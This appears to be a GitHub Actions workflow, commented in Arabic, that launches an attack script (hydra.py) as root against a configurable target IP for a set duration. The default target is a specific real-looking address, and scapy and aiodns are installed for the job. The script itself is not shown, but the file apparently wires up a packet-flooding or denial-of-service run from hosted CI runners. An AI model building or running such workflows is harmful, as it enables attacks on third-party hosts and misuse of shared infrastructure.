# اسم الـ Workflow: Debug and Run Hydra (v13 - Corrected Syntax)
name: Debug and Run Hydra (v13)

on:
  workflow_dispatch:
    inputs:
      target_ip:
        description: 'عنوان IP الهدف'
        required: true
        default: '63.246.154.12'
      duration:
        description: 'مدة الهجوم بالثواني'
        required: true
        default: '120' # دقيقتان فقط للاختبار السريع

jobs:
  single_attack_test:
    runs-on: ubuntu-latest
    
    steps:
      - name: Checkout repository
        uses: actions/checkout@v3

      - name: Set up Python 3.9
        uses: actions/setup-python@v3
        with:
          python-version: 3.9

      - name: Install dependencies for ROOT
        run: |
          sudo python3 -m pip install --upgrade pip
          sudo pip3 install scapy aiodns

      - name: Prepare and Verify
        id: prepare # أضفنا ID لهذه الخطوة
        run: |
          echo "تعديل الكود بالمدخلات..."
          sed -i "s/TARGET_IP = .*/TARGET_IP = \"${{ github.event.inputs.target_ip }}\"/" hydra.py
          sed -i "s/DURATION = .*/DURATION = ${{ github.event.inputs.duration }}/" hydra.py
          
          echo "--- محتوى الكود قبل التشغيل ---"
          cat hydra.py
          echo "--------------------------------"
          
          echo "التحقق من إصدار بايثون وصلاحيات sudo..."
          python3 --version
          sudo python3 --version
          echo "التحقق من وجود scapy لمستخدم root..."
          sudo python3 -c "import scapy; print('Scapy is available for root!')"
          
          # --- هذا هو الإصلاح ---
          # حساب مدة الـ timeout هنا وحفظها في مخرج
          TIMEOUT_MINS=$(( (${{ github.event.inputs.duration }} / 60) + 2 ))
          echo "مدة الـ timeout المحسوبة: $TIMEOUT_MINS دقائق"
          echo "timeout=$TIMEOUT_MINS" >> $GITHUB_OUTPUT

      - name: Launch Hydra and Monitor
        # استخدام المخرج من الخطوة السابقة
        timeout-minutes: ${{ steps.prepare.outputs.timeout }}
        run: |
          echo "بدء تشغيل hydra.py الآن..."
          # التشغيل المباشر مع طباعة المخرجات والأخطاء مباشرة في سجل المهمة
          sudo python3 -u hydra.py
          echo "انتهى تشغيل hydra.py."
